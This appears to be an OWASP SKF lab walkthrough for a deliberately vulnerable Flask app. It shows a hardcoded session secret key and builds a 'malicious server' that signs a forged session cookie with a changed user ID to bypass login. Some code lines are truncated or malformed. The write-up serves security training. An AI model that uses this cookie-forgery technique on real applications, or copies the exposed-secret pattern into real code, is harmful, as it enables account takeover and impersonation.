Python - Auth Bypass

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:auth-bypass
$ sudo docker run -ti -p blabla1337/owasp-skf-lab:auth-bypass

Now that the app is running let's go hacking!


Let's login with admin/admin:

Once we login we see an API key.

Let's have a look at the source code:

    SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",

@app.route("/login", methods=['GET', 'POST'])
def login():
    sqli  = Classes()
    if request.method == "POST":
        values = sqli.getUser(request.form['username'])
        if values:
            if values[0][2] == request.form['password']:
                session['userId'] = values[0][0]
                session['secret'] = app.config['SECRET_KEY']
                session['loggedin'] = True
                pref = sqli.getApi(values[0][0])
                api = pref[0][0]
                return render_template("loggedin.html", api = api)
        return render_template("index.html")
        pref = sqli.getApi(session['userId'])
        api = pref[0][0]
        return render_template("loggedin.html", api = api)

We can see the cookie session secret is exposed, now we can try to recreate this application cookie implementation to be able to recreate a cookie to bypass the authentication.


We can start building our malicious server.

from flask import Flask, request, url_for, render_template, redirect, make_response, session

app = Flask(__name__, static_url_path='/static', static_folder='static')

    SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",

app.config['DEBUG'] = True

def start():
    session['userId'] = 2 # CHANGING USER ID
    session['secret'] = app.config['SECRET_KEY']
    session['loggedin'] = True
    return render_template("evil.html")

if __name__ == "__main__":'', port=1337)

Save the snippet above to > and run the commands below to install some dependencies. Of course you can also run your app on whatever service you want it does not have to be python flask.

$ pip3 install flask

Save the following snippet code into /templates/evil.html

<p>The newly created cookie for doing the bypass:</p>

We are ready to start our server:

$ python3

Now we can replace our original cookie with the tampered cookie.

Send the request again:

Additional sources

Last updated